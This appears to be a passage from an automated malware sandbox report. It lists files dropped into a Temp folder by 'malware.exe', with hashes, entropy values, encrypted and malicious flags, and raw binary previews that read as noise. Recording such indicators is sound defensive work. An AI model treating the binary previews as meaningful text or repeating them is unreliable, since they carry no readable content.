                        Category:dropped
                        Size (bytes):112460
                        Entropy (8bit):7.981421115606284
                        Encrypted:false
                        SSDEEP:3072:8Zhosv5bEWW23XOwlUeEg+5wb08K6/C4ct7TC:4oqFLz3XOqUeEgA8P/C4A7TC
                        MD5:1033FB80EBBF3552D65E51AEF2F1BD07
                        SHA1:6C00C63ECFBF229D8C3EB24303D30145C67C653A
                        SHA-256:CB645C6CFA13425BC6F9B6A7A584A1DCC3CE2B318856A1F5FFC70242080AF5B0
                        SHA-512:AD5CDCD096A565C6BCD35A55D252DD027002F9889A806630A3831FA9082956F28A6A037F0E436F1033DCED108DD61A0A8C1229B1DB79ABBF6670E78CBDB3A029
                        Malicious:false
                        Preview:.SU>.....O.....*....h.9...j.W~Q....HN.....Q.........u,[...*.G....\.t=O.....x...[.6.I...&rl.^5O.k..'.=.._...=$...,M5P.P..f...V....*.jH...M...q.|U.....v.7...VL..h|.....6..zwvZ.9.&...7.*.A.ks.i.8W..|...6U...t:.. rV3Nbi..[..4.f..\..7..)u........S.....y...K`..Y...X....P..a..P..^g...N.S<.pJO.1.M.5..B..`..'.7..\.*.m.rsHi...,....."T......V...J..HX./B.d.....1.xM...X..7(>..m..W.$$.........x"...u..1,'..)kA.5.=m..M.IQU...H..;.v.|.s.B......n..d....X.T..Q...:J..9a.`|...l..y..E[U.W,:...i.)L. 2.Ho\.Wxgi....@'.......<..g0..$9..v...1..?b...3..?..dt..O.(4R....r..TL.+......@.K..s..E......4.R......4.......b.z...q=..w.....W..>)....).f7...K.@.w.....~`_....a.. ...+.j..V...2..-]....Gb@...h.B8....v.Q.....8...~h......).....C.|...X.0..=.<.E.Co.c%R.........B.f........#.Q..gG.+..%.....X.....-...`.}|.5_...}.....<..].|]%....s*..1=....Y.$....y,..n.2G...|(Jx..351....[L.)....e.Z.....v../j..X.4.M.*.....e(O.o20ePH1...,.|...+......\.GrP..-....]./...`....O..h.

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1000.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):39856
                        Entropy (8bit):7.995647450290974
                        Encrypted:true
                        SSDEEP:768:rf2ifIkSa7KYKXZ5DE1/5l4IYh3CaZdXNYDou1gCu+SSu:9fxKve/j4Jh3C+8DLgWSSu
                        MD5:F86E9409BCFF0E5A4CB1EB2090E8F7CB
                        SHA1:0A1AA0453E0B0075FF68A057DA1075130E8A5DAD
                        SHA-256:068D69D76C7FBEE5DAEFCE221A268829C78CBED3DBA8AD2658EF2C0E60F520F2
                        SHA-512:7E5DF082BD92BC54A2FF7B855841072B86E35242A5F9005FD42B5E1B5BF3E0D77A19EF39162B37760AB92FD1C47D9C533D1ED1AC1949F8F6EA2113ABA86E9E70
                        Malicious:true
                        Preview:..p...........J.. Pc...jm.....mNP.FB...CG...?.)..1..]...*.,v.CO..C.......I..D..@.A.......U.}7...p)...1..*....$.....E...gv...7'.!...{.UwOT..6.tm...J...}.qp..C..nB..%.v.....3...jN...9..R..p....v&B....a..NA..~Vd.-..t"!qC..:..E..X..e.'%.g...Q1_"V.[...+",.z...G.b..q..J..i7uXda. 1~8k.....O.v.=..H..7.@k......s...5.?...U...is...K........\...)n.r2;..C..2.J...G..b...=.a...M.......>z.A.....)..Dv......Q..h.K.VXA...^..C...e.m.h#.w..V...lDRo.SUb.4......6........$7...iM.V...y`Uz%.Y4....q......agg......:D<....K...+..Lj.xv].[N... .k}.k...qFPx..6+mVb.....9.6..W..?...q.%o.~.....bz.........P......qUG....s.J.'...A!.....ZH...(.....o..]`Yp....].7.....n.<P.>.....W'.qi9........Sc.=<.......2..8.,.o.0..g..|c.W'.......fP...8..A.zJ,.."...<..G+.).#.#..[......X".].m..W..0h8..ljg....q..ECi.........<)..i.]..=..?.f!.....(..d..a..........;....)k%...f...v......j....U1z...........D....Z.ig0..d..Q.%'5x...9...W%...x.&ZN0q.z..U.HbF.TO..Q*.O..yj"......=..N./q<Y.

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1051.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):18296
                        Entropy (8bit):7.990333301947933
                        Encrypted:true
                        SSDEEP:384:eDVpQj6HBafYCvx+BiIQTSyiCYCB7VawORI2uK2Hmu8pnOp:QSOHc35qDYB7YwOF218pOp
                        MD5:AA250FC20AE015E575FA0B957B291917
                        SHA1:7379CAB0A9A5612B086C0336DF9FAC0EEDE7E16C
                        SHA-256:B5B255FCB8A6FF12823F1253D978F4E635E5C9FF7CFD50536A0397101E33C3FD
                        SHA-512:88A4EB9730B89833615470E5B153CCC5459A17A02505CD366DE5232543CBE541ABCA4A4C864197F6A6836D364D0F12FED7D4BC3A52D7499A6DECAD5C928162E3
                        Malicious:true
                        Preview:.............zp.|..H.@..........h..1rvN.s[r~.7..@f.3.V..6_.&J.......S......m..:.&#......h...n......I+m.D.).=...s...tC.z..........W.`i....h.k..Tx...>..XZ.2.4.. .H5P.`...P.IU..)."J...n....t...^....(&..4f....g=4...S^xtt.jg.....P8.....l-ibb+FIH..k..uUr..c.+g..^.C.+..Y..t.?..!N..$....29<......|yt.<....b.cq.Z../wXK.d2.../$..]..LF...NIA.*...4..p..LQo.d..&.D.>./....PY8....P...&....F.....fk...X.c..^...!x.5..L..+*..L....l...CmK3.}..... %.{7.x.........,o..! ....+.K.P..;.LAY.....*P1..YCK.....-.).o... ..`...\.W.y{#.0.........8i;r.(Y..'..w".....CE../.. .Q.EK.7..a...}.TA..+.)$LQP,4..c..t..@@.13F..x.XSF#T..Qu$.\.$..].U9'..........._...<ezQ>.,A...R....T{.%..D.uhkX.Es../z.6Nk..m..S*..Z`..ko)....Qz..qo..J))..J\...h...9...9.}..!G..ZV. ...).Dj...{D.&.hi.$OE...6o..d8................cf...f.*...P.._)H.H5...z......d{.W...cLf.i."...."8$........,>-.'....g..bo...^+..;a...P.B'..........]f....../..?U..{........00.N..}...m...8.F........s...c6....y..Yc%x@.JokH.J..J

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1051a.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):95852
                        Entropy (8bit):7.998340206662089
                        Encrypted:true
                        SSDEEP:1536:yfUb6TTTMcX1APiHDAFMGnDO7wORFyDoQE7qsZw63H6OPC0Ysixi5SvFYL0Qq:yVTTTMR6j69O7vRFooQx1YbPS3xmiFY0
                        MD5:DC6F75A6D4F0CB1B99B095BAFF9C1D06
                        SHA1:53BFD990A485A5FEE7B410573EDDE31A120FC7B9
                        SHA-256:4FECDDC6C9AE5BA8BDAB2F7D9CC2EE871A837590F7D9441E3B4CA795B9C94FCA
                        SHA-512:B91F8B7C969B87E4E00C752D55981684A048DEC39AFE1E3759E864B2EA5312CBA0BC431CC6615302F99E0B7C3DF02DB481ADBA47B15F598D35C9DF4DDEF69596
                        Malicious:true
                        Preview:h%=.....@.......Sb.......r..Av...l..[.0....6.-.In......\q.s..}BI.....l.[....K...q.IU.O......M..C..iWAF....:.C.YN.. .e.vQ.s....3v%%..4.>.U.,.I...l.0.k.........e...4k....w'.N..?..-+.s.....&..=...7,............X=p.*N..1..l.Iz],TN...(./.).......J.....T$8...V.;y..SN5...u7..s....;.a.Vb...z.<.^...2.=.T+....s..!...&o...n..#M..V.._.......K.M,..5.. .p.)....o.%.`.Wz.F.^......{.....y/L..'.......qTfG.w...h.2.h.*W7.....$..vpv.h;V}...o.K.}w......'.c2a..ox...6..y.@.Y.......j./Hh..}.O.e.....t..J.BU".....^.9U>.d...}.Wr,.} .ay.&B...9p?R..Xgz.9S....f.......YR....0Z...o..4............{6..I.z...fk%M#.=.#..l..b.+. ....U..D.....e.0.....q...D....<..W..RG.Jo..a.I8.&$r.-M.`.5...D....R.=:....4..x.....!f4i.1..C...S?............:..w.I..vu....Af*r.o..*....~i.B..R.l-.+R...%...B..$@UU..c.{.E.....1....d...K;@}..-mJ3\.`2t..j...w.Ew.Z.".'.)....)...n..B...(..V..w.rn.dj....,..,M.....C.....fM/.|l TY.;\.r-mL'...P..=f.0T'J\i{.E......J{..p.....9.....V+bH....c...^[.e!'..J....6<

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1051b.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):318628
                        Entropy (8bit):7.973772341359257
                        Encrypted:false
                        SSDEEP:6144:6khw7QzQ7FRx7271hNKXepgFkqaa4/026LfMU/aMDzLywVs2:6owEQ7FRLugiqaa4c26LfMU/5ywVs2
                        MD5:779D8497015E44BD74C674D5476D3B49
                        SHA1:A7723A4FC4884F1F35F0114B81209890378801D3
                        SHA-256:90D641BF5C2F949B8407F8B3960E9DAE8C4674EF0D37B2B93EE52E39C436F8F4
                        SHA-512:2BC3B24ABF32E85B546657E8D4E27599ED947B6F175DBA7FF08F39A6968EAEF4D5144E958CE0BFADA217055DD73B896B6AE32F13BEF5AC57E76F12AF37958D00
                        Malicious:false
                        Preview:t....#..On.k.....0..}.fy..b7"..lr.6......(...G.X.]A!].......<;..."..d'`. .&e..i...|..D.w....(..d..w...*J.7.%....@...tce...*..c{'...)..."f.KH........2....11).Z....t.X....Sqc.R..=..~w0.@..N3.E.....y..J..D......-k...kv.j.$.u(.^.2.~..$.................X..).e.t..v2A..X...GF....../.^..:7......ZLV=+.o]...A.97;G..K....i{.....cE"...a......;^B%...1...f[...a.....3........<.'n.#[?......qe...}../}o..h.\...r.....+.q.!gu..yFW..!h...b.b.......!+SR..S.B..U.ID$pE...=0..F...^.....(...oC1.]...i.}...K.MVASb.......!....F..>T...u...i.6.qWe.g.....e.._.V.{.....PK.Mkr..y.M......+.U.tM......r1..._...].r....T...h(..b|..yip..@.TD..M.N....n|x.4BI.]k.KA.B.i..)f{..Q~N/f...: .F.......Xt.Mo.Jf\..\...b...q.6......^.ma.(...2.+.......R._4...e...^v..hd.M...0.9}"..K?.D..../.h..r..z.z..."]...z4.Y}.n_..W..;.![.K.....Z..W...c.s....&#'....H..k..}dv#.....zt..`.2.).!|.Q._..`;...C,R.w....%.F.C..,%..W..."%.}..J..K.+.'^....>.A1l:.....;......5\..{......JC.f.S<.A|.x.&.....2b..cM^.;zP..?.4Md.

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1051c.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):159290
                        Entropy (8bit):7.976783825519224
                        Encrypted:false
                        SSDEEP:3072:JTB592qkVDbzsr25XVFOWcA47pIRn/atx814SY2E7LcsfuQvPxzvJ6pUDk4Q:hdcDbYqhAA4aR/Qx81wHDf7vBvJjA4Q
                        MD5:460CCCFFFA2540189A300D5C3D46A8A8
                        SHA1:77148A02E758B36C9F17AA7ADC93D8323BF94C03
                        SHA-256:E6216E00C35997426C80BE75CF81D8208217410C59E84EEE7323A8AD3A176B9D
                        SHA-512:3136FDF225E67C54000931D4D488F5BC37E6D24378CBA606B3378BB1AD5A5610F744A0C4617740B638A51B790EDCB68098C79DD9560C0D9E2D9FCD02AEE18F7E
                        Malicious:false
                        Preview:.?G.. 6.Zhm...S...b.a.$.....K....m..*lia.X|d#...Q....:..fB...~&R:!Ta.2v}.0?.7...*.N~.....]........-.N...b9^.{....T....g.C.;.J#...Q..l."m.$d....$L...?MY1Z..eWW..0/.x....$[-.C....4.........".~..Zp.d.T.p.?.....'.d.7..^L......(m.g...>...q.N?2...b..._B..K..B.J.&......*.&.......d..d..._%0...N...&..Q.J.H..h.t...j...._H..W.).I..2.%.?...]<........@0.W..R.{...V.).l..l...e.T....\.....'.V6h.g.s....S...O.....).-iE.8hEb.T<.u>..T-}3)|B....D.h.[Yi.rKD....... F..[m....,.0.H.'.I...[..\....1.$..I.tmy*.Z.$..H.cZ.."(.T./SS...=.O.l.My0....V..Sc...b....M..t..v&....C.../..x.W..K... ...../........6.....%..o...JuA..GT...~=..#I.....T.L.w.Fb.-.-2w...Jn.......N..S.e.Dp....^z......o.q.:.G..^.....Wu...t..O.z.1..^...k...xJ0...P..h..5...t....\..M...u.I.:.r&|IG.......*.O..v....b....Kg .....f......\t0..,.c..E|6b....n,.}j..>!.......8..>.nl...E..:+ma....n......R..J..T.H;\..g=..%...x.. .C......9...[[6...d.7.G.....cH.L.....K..l...&..d.$.....^..bFC.6.=.+....)...../..

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1055.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):190940
                        Entropy (8bit):7.968665606103786
                        Encrypted:false
                        SSDEEP:3072:SP3S4Ftv0W/NSZvz5IdN2UqlNTJ18lWPRh1AoBOI67khweawNgMjqMULCZV:SPhtv0WhdNMnl18gJAJ7mwkNgJMUUV
                        MD5:BB834D5127F6836A3A6EFDE7370CA072
                        SHA1:8AD0443FE5B505D0C5D61E84ACFEFAFA9B9E95F6
                        SHA-256:86283F404506939FE796D07E18C7A08B56A9B70C14EECDCAAC214E239B46EF69
                        SHA-512:B919DE8F913516015826F9CBF269B6CE56292E4BA5AB69CD2A14E239BA9D62524A4B8D0722362D2F73932488551BAF197F7704BB134C8148AAB5F6D2D0BB7BD8
                        Malicious:false
                        Preview:...fCz....4...=9.r.1COa..0.V.PF..D..._z......A....w.. ....L<.m..S[..Gq....G!..@.....~.ha..#]..k8.._....!..Eu...W.....t. RV.GO]....f..8%c?.r....a8.k.3.n....6......M.:..$........_A6ut.|...,....F6..W;.... ...9..5....;...<m....,.k..6x.$..<...7..+P.C.=.,....a.._/...tY..C<_..7Q.u\y......\1..:.,5......n..xz...h.[..n.....9f5..x-.\...H6.....]...*...P.....w.......:.d.W.J.Z.:.G......W.H.E.%.H..q,.|.$.}.0....U(.r....L.dh.:A......;l...........>Q|.1.5.....T.s...d...f...../$Qx.7..9...0.o..h...-L...3}[Z.C"Mb....d.>..SG.....%...9.c@.....~.E.......L\.3.M{A....Y..y.....JV....gZ...W.q..0.9'`H..~n...4."|"....~..'...8.H.M.ZG.....o...s.cwc...|.7...K.+..Z.?T.L....Yt.`....`..|...2.@zk.6.q..i!.B..V.<.-(.._..H...0..k...q....b.-Z.-....l.U...z..B./H.Or.>.'..Z....I..(,.G..pz./..... .`..S.....F.W..2..G.)..D.6.B&.....;.f....jhQ.?Bq.^...h...3..k..7.X...l%b...K.....L..|E*.i.....i....$..:,C..b.g...7Gif..w..hj.....,+.....Y...g.....[...5.1....A.r.o4.*.........ZaKA.#.x...FR...?c

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1152.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):115826
                        Entropy (8bit):7.975513416765305
                        Encrypted:false
                        SSDEEP:3072:ozZLtf/pG14bdbsiWMp4NWHPTg4C1rVw5Sqw/NAUBT0x3PGG:oFLtf/uj8Tg4I2E1NAMin
                        MD5:4CB615CD0E4BEE93FCA7F92C7FFF6D73
                        SHA1:7D3573C4E0D2B59FF158C2B8853610219F64C9D7
                        SHA-256:5F4C7566D761777570BB8EF2971923B2A3A175F5825CFD5CE882360A8B8BBCF6
                        SHA-512:8E0DFA4111603B8D0A598B2B7B570090E29041F866AAF214D70A3C62903DF7F1515E47C7D2745913695FC0BE4C7AC2F46ED41110A11DD38BE2ED06838A4D6BA5
                        Malicious:false
                        Preview:...o..yW...m.W.).........,=bu2Py.L.;.M...z|...~rw.|.......V[b...N....e.. .N/J.7...hJ.1...C....<.8q.;..q|z..@s...3.u...+].Q^.V....S.!...r......A."...g..6..0.X.v.(... .0h.a.(V_.@..4R.. .{.b........i2.....^.......K...j.9.&..8.E....R.MM$..&M.>`h|.g..p....]B..m.........<.E.".9.`.l. .m....<..IC.......p4..o..[OLW.'t.dD.'..(.).`...%.....w.~..O..N5dk.....)...%.....2..y.....goS...Dj.e....!..$..I..3.eShM..C....!..yf[<.uS...p....e.=..@........$.T......M....q..G...!.J.... ..._:..20..l..>.7.av...N0r..Xf3A..e.2o..*lq..{`........<..&.@..i.g..j....k../.LZ=......W3....{.7..v...#.hX...[.L.|(S")..#.4..2!.m..f..G..s.W.&.M..gE.KT..f.Q...n.CMK..Q.2.9....a...mF..7.U...k.....:o.].).d...{...u.i)T..F..f.;A.F..:..e.M..BI........k/.u.....E..y.....A..i.N.Z.G.fM...^........Q.<..J..6......j.>...a.<....m..p.T`t.,...1.x.fm....n7b.k.+.....M..'`.8.'....Ju......(..8....U..B..Mq|.x...Q...@U..."E...3t..3..X....G....3S..G./.g...%.(....5.F.c!.gE....B.:......o;

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1152a.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):179048
                        Entropy (8bit):7.98220960184737
                        Encrypted:false
                        SSDEEP:3072:boQD9sUOc/LMjonbWfai8+u4tSy9Ge44c+vWZnieAcxQiXBEPuTBDp0S:bBsNc/LMTXvRtxr44rvW1ie6iXBLp0S
                        MD5:D3D63BBCA799607F2E1999F371E89A8A
                        SHA1:CA3D622C1D9F561D82167A0278D90BCA5A0AC818
                        SHA-256:2BBBC4A53299B3EDC50061C22E72364AEE59BA805CD9A9D11D1D9E67A4FA2324
                        SHA-512:1B8E15E022C7D9CDEA52ADA4394F42C598EF95D2219C2F437380A99D57392EA30E7466E4B2AE6D65B44D921EC29ED9094BB72908601B047BA38C672D82C93AC5
                        Malicious:false
                        Preview:D....e.L....J?.I{.+.gB]....@..K...}..a.^..X..g..........V..]....9......a...m.L.....am..I(..~.fcLw).......o.....D.Z.^?...q.y.V..?..(w..y..... ......0...~q.5...$6./.... ~.....O.:.3....y.....'.(o..;..!..y ..^`n........z.qB......9.^..k...........j...W....R.&...-Z...@.......\C.q...l...YnP..6.t.~H......(..6[..).b..@..(..$.A|.^U.....4'\f.C7H^.Tq...9..:.....O`.....q...n.C..*.N =..Hc.j..Ee.%v..7F@..g.>I....A...W*s..:..!zm...o)..CK.....^ne..*..Z.C.H.s.C.k......~....=..qlX..Ah..r.m.....su.=.r...r+..}.LL>.....d.`.~.......t".]....0..a..U:...<.qd\df\....dZ...*..W...t..0H7.j'Tw^f....K#@1......C...ngi...#.p.;...:.M.KW..6.w..j.#.sP...mJ:..FR.'4..4..;......$)....................s..(]h.P.k.b..*../x.o.9..|....V..e..=R.K(.....R..H...........4X}m...%[.}.....C.b.Wn........N...a)0v>.B.Q]...$.....2.l/...1MTJ...N..b.s.L0O'vPOD....g..\n.!u..Zl....y.u[...+(ZC...(|n.V...ts......}.m=.!gb...........D0%........+G.'>F.~.....O.=.{...LK.>4".OO.xO%.......T(..X.91

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1152b.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):304632
                        Entropy (8bit):7.9852786988996725
                        Encrypted:false
                        SSDEEP:6144:4PNau0subxufmRfxBz3J2fXGgbh848pbvRvqatwOmZeeG/SiU:yNXpfWfxCfG2848NvnwOmZt/H
                        MD5:3AD3FDD51C3F91C15231FCCF93C9A227
                        SHA1:C0BCF57954735FED3F9809CBD0B4D1E98AAD94D3
                        SHA-256:26ABEB68CA2A7CE675A9E00D0D77F07D958CA4219A9F83EEB73ED2A92C2E26F5
                        SHA-512:7030B198D4D952725AEE4D0A5CEDCA925BA6A2C28E9BBFA33D2EA84E2AF87A20F65EB33A7FBFF5BA2A912EE2DDECCAA18ABC98E7A7F14B3D27F4B41BCF8B7FB4
                        Malicious:false
                        Preview:.Z..m.hA5.2v....Zr.H2..y.'>..m.|-.<...=........[.#..=.i.#...O..M.4C...6G.Y..V.....v.VH.a. .^. i.b.............H.(g$..M.58.i(.q..^.SJ"..-..'..F...!....*xJ.5{..j......|hU....|~.-....b1[".67e....5.....f..".E......D!...7...E........$s....q..!.v.3.<o.+..r.L..F.n.*..\.!z.Q7.^. Z.....h/.u.....>......:......9.s..*.Dp9.....vKN..pLTE.G.M...L%..M.Oc,./.f..(.T....6....gvw+..:.O.jm...9i.)Zo.8-.M.>U7...zG..z.j.,......o;R5.w...P...........C.,..L5...`l.A.....B..f...R.'O..?.......[...a.....>...6x_.y...2....W..=.A..`..r.....9..QR.h3.s...........U.'.%.....n.K.. t..\P..P.S.W.... .7.6...;T.bbg..d.1....-.2..z..7.....#MN.c..]..]....C.a.....bS.P'.4...$..x..V.=.oiu.L`k...).1Q..s.e....I...#>.....&ru.v.........l.'y.5...ME.wN..J~..}.i!G...p..XrU..E)W;K. ..y..o.. .P..D..n.q.Q....q..jl..)f.TI.'o?.....j.....e.hj8a...w.j..@w...qE..*.B..e.*w.....s].{...pe.D..'..../r.L........q.,..J.d.(t...p..9<0D0.....i..M}..r...r......D.#.................9.....WZ.6a...O..`E.l..S..P..Z...$.....~

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1153.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):98854
                        Entropy (8bit):7.998247019373787
                        Encrypted:true
                        SSDEEP:3072:qO1uNsZDb58MNXyFDEkGPwKXcU5Yz2smZ:T5x8MXaK7fsU
                        MD5:334978351F91C212FD2E9829961F8F20
                        SHA1:679A07CDDA339D46367DAF0D3933ECE11BB51CED
                        SHA-256:ADD815439C431E020B1CADF7C11D4CDCFD3A42EEB84B7478A6042F19CB8FAC45
                        SHA-512:DE745B9CAD47F55FF88550F8EF8BCEC4436E09833EC70DCFC9A067873262E9A98313D01B72E4B8001819BBFADE3946DACA4384C8460EF1509BC35EBA94B95D37
                        Malicious:true
                        Preview:~..dD...Y...\.... ..r.8_.-^.......f.\s....&.d..ui.b.{..8..Z.A=..5.....@..J.g..|..B.,...q?t...,.ZAnb..`....;<{..K...8.Y.c......>.&C#..I5.T.1'}.M.Rx6V.m.)!..$..w..6..)....c.>7&.s.r.K..t..L..EB...{e.b$d.0......?.o"..b.=j.;....<t..pl#R7:.y!.._.7.Xz....6.F.9...Jh.......<s{...";5A7.=..:c.Rb..!....]..?.....n.S.....rlX....Pq....}^.....w.....%..N...k..-X....1CL...' .S.k.......<.i....@L;6,...Fp.8.......I..c...-R.d$x(x..9f..N#i%`6<$..}..)..qa4.......3...N...}.Z.1....7e:..O...TT..Ib...\..XT.6.....#o.kC.......G....g..i..M..|6L..;...+A....v..K.B..tO...g$|pe.$7...6;...i...t..J....w.u.W....?.-H......_...Xj......W.9....C.D....7._..F....6.d....3..<.@.L.....w[...%V..Z./*C......>...=p.#v....V=Y...~..b..].....oF.......d.<...1....!.nB..p<........u.!....3...z............%..1............(Jk.m..(..yJ...o.G..y.....|$7.....z..x5>.E[..5[D/wk.U..y.:.g."-(.-. ..+..<....A.."..Q...*H... >R.d.#..u....(.......t.t..+.^..d..g...R.......t.5......]2R4.f..s...1;/..FRj.

                        C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1157.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):102420
                        Entropy (8bit):7.998259062659849
                        Encrypted:true
                        SSDEEP:3072:+GUA/bW2+nTigdWneEReZzg9grWJrBgIL:+GLW2kdkPgzggroaIL
                        MD5:0E71BE1CFABF3B9B1E8FC99667C5A921
                        SHA1:D2ABAE46E61EAB7F0349C86C427D874F43544FB3
                        SHA-256:E23A9791B79D55CAC53B0EE9EBB0765BFED3BBB20D531C3BFCD4853C2F4306FC
                        SHA-512:1CBDC07C95305C430293A4FCE5468D4CF1E31E85D0F4426BB1DED3B63706E0F3E8028EDDBDD72185764B2AE8B3543BC2BE5D5D228050DBC6DDED0DAD1B9A9E8E
                        Malicious:true
                        Preview:.n.\iE.qq../.......n....h..0.2..#+l.G..#wE3.lP}:Y.<*.\...$..eD5O..P: w..t.P..,"..".s`......v...b..9.y5.}.~.#.<....I\.Pa...S.ec....NB."xq.....%U.ep......q1....E.N...%.M.......L6.....:.......=l%......l.}|^L.gT...w%..cp[{...........<Q.......,q.....4L...M.;..)..:..wW.~*..a.mvd...T0..L.....J..F..%".<!.......$.).Q.H.]F{S:...Y~...^...4:AO.L......%...(.k....<G..k..........:W.=."N.K.zH.........]Z.v.,R..L=D............'...|.Q...wt.>}....>....b@.-!..8#../..V=.0.Q..\H.^..U...N.ea..Re.{N=.D(..4B...^.<e#......,;.k.....a...6.07.....5...9.........QD.AD....K..F..b.l...:..~....5.....v.<.JHr.W...Z2|...<P...."."?".)5>.Ff.Y.<..QO!....rg...&.a...Y.....k.s.y\...1....Z....`..O.!..............jG....xC..t....$.5qQ...m........JU)...4.8..`<.b^.l..E..A.Q..p.3iQ....~...|.[".7..G.d....,.:.i.._.Y.yJ3......4..{..r..~..[.aD4..........J..K.M0.}|n.L....A1.....~.........d.d...>~....)...u.y..............rM,..I._.....P..p..#..I..G..s...D......D.5...<.7'...Y..m..B...I.T..E..=.'.3hf\.

                        C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):22518
                        Entropy (8bit):7.992372293862752
                        Encrypted:true
                        SSDEEP:384:taotxdWzL0L4kzdreSGzvBQ6Y1qjjMbqnPwvnpYNJkPMowNIvH0+mvyd9:azL0LZz5eSG9Y1q3nYvpYNJkUoPRmvyP
                        MD5:C72487F3DF9EF341BCFE6CEEB19716E9
                        SHA1:5653A3C5A72C7BF4868CAB9A9D039F6567F50108
                        SHA-256:7806032D5BE604E20E7454DE059792EA368CAFF4A47CBAEB802090E5C7B20459
                        SHA-512:D7EB694DB07F75E40F33B4EF520B992541D528376991509EA3556A708B6B3D8DB6C5EB50C988344426315E01839A93EC35AA19F27B2091E13D783967B22957C5
                        Malicious:true
                        Preview:z..<U....s.:...yW....5X."o.......p......+H....EG..*..}AX.JX7kl.. f[v5.L.w.f9...2..}..../....'..-...V>....a.M.1sh..S...K_.....X...4Z%.(V_.8.1vCc2.......\..#H.1..X|~Z.M..TE...V...P.B. Jl........w......q...f..nNJ.4.,z..u..tE..../....h....,......*....{).~.1C.#W...0f..zv.p..6.G..2\0.b5.3.u.};|...}.l5.tY...<c3.d....l.".D.8g..K#..A./@....H....<..F.n.}'(..............k..k..R..9....A......e....P[0..cB=$K\......$......J.n.}J+..$.t.T*"..%<.......H.n..Lz.....b..Y.....pbI$n.ES_..:.R..._..X.FR..1..c.J......?../|.Q.F@.......C'}Z.J....r...$.@.v.....Z"M-.{nGk.d..^........UA...9..K~..J..e...%.[..".~0.vO"..R$..."..#n..r..../+V..`--98.S....2......ij..(09...b.\.L#M.....if.q2....I.k...........S.m..7..Atyw.s..{.P*.|jaU@-gz5......z.,oY=wg....p.r.3R..K.H..W...;8O.W..IO .Xl....' .wh........$m..........j..B...i;E..>..FE.0.s?.{5.b#.{..Ka....8.g..[w..v.n..Z.~.m...."!..d.S".<...G...v...8F*.8.zA.w..87...fF..rFQ...I...}....j#fSm.i..R"..X$.........7G..o5=.S.....

                        C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):199404
                        Entropy (8bit):7.994463787081131
                        Encrypted:true
                        SSDEEP:6144:Gngq8nC7n5b+HQJQgxQHXXDVt0sFSGcXFnIzYC:GnUC7n5aHQtMXzJFSZXCj
                        MD5:35225FABADE49F6A9ABDA242CD34B6F4
                        SHA1:C09243B624824532DEC86B53922ED28B2F45A794
                        SHA-256:90E483EA9B83B4E4DA11DFA050B05B093124CA878822F79F5C3BA84D40C5F91A
                        SHA-512:4EF94920ACD325AA21A1E04D5A855A9FCBC878C1D686952E56480F85FCDA38332D7DD8E86E8EB1CFCCF846D9D112EF6FD3529FBEFE5630D882AF43EAFA4AE543
                        Malicious:true
                        Preview:-..:3f(...{.-^.g.g....j......>iJ....i.n.I.H.......b..X.]..e.7.....Q`...U....3k.V..<........5.....s....2..........d....u-..U.GE....V.....qB..8..nu.e.%mm.h..n_.."....C...b.z..........(.=U....4......]......!...F.2.c..s.p4 .`T.&..T...^P.;...w....:GE..{)........LX.....TW.[RcK.?.Az.0.EDH...O......(G.w..is..q.S.ZPh..z.h....@H.. .w.8(..v..=M.Ae.,..b....#1&...)..c..8.M.....?-.`L.f..11.x[.<A...4..f..?k.n.38..$....~.."e..z9s.t.V.c.R)Q.R.~O.8...^.k........-(.s_..).c.).).(0.@w+M....$.....>?..?..c.N.a.I.7Rd......2.|.o g..>..#..O...........RF .3.."=.uZ.v%y...ekac...h.....J.t.....Ny.....X..;Q.yF~...J.G|..C2|4H..P.E...I.4....M......K)...l/.i^.lJy..#u..Y(Jo.>.."008W"..R...Jf.M.SP-.......k..6.b.D./h.S.3..(..v..R.WP.E^.}........OFGq4..a.d..S....p;:.[.SF{wm.V..~m...u...`\.......Jm..7.(.N@:6.Qfs..N....Vc.ND..y.5....'..^6......%.e..2.@.....|h.@....M.go.]...#.6.,.y.p...p.....@..V.v.......s...ds...m.w...T......~#=AF.G.-..I...|.....{&.P......4..K..{6..w.!......'l....:

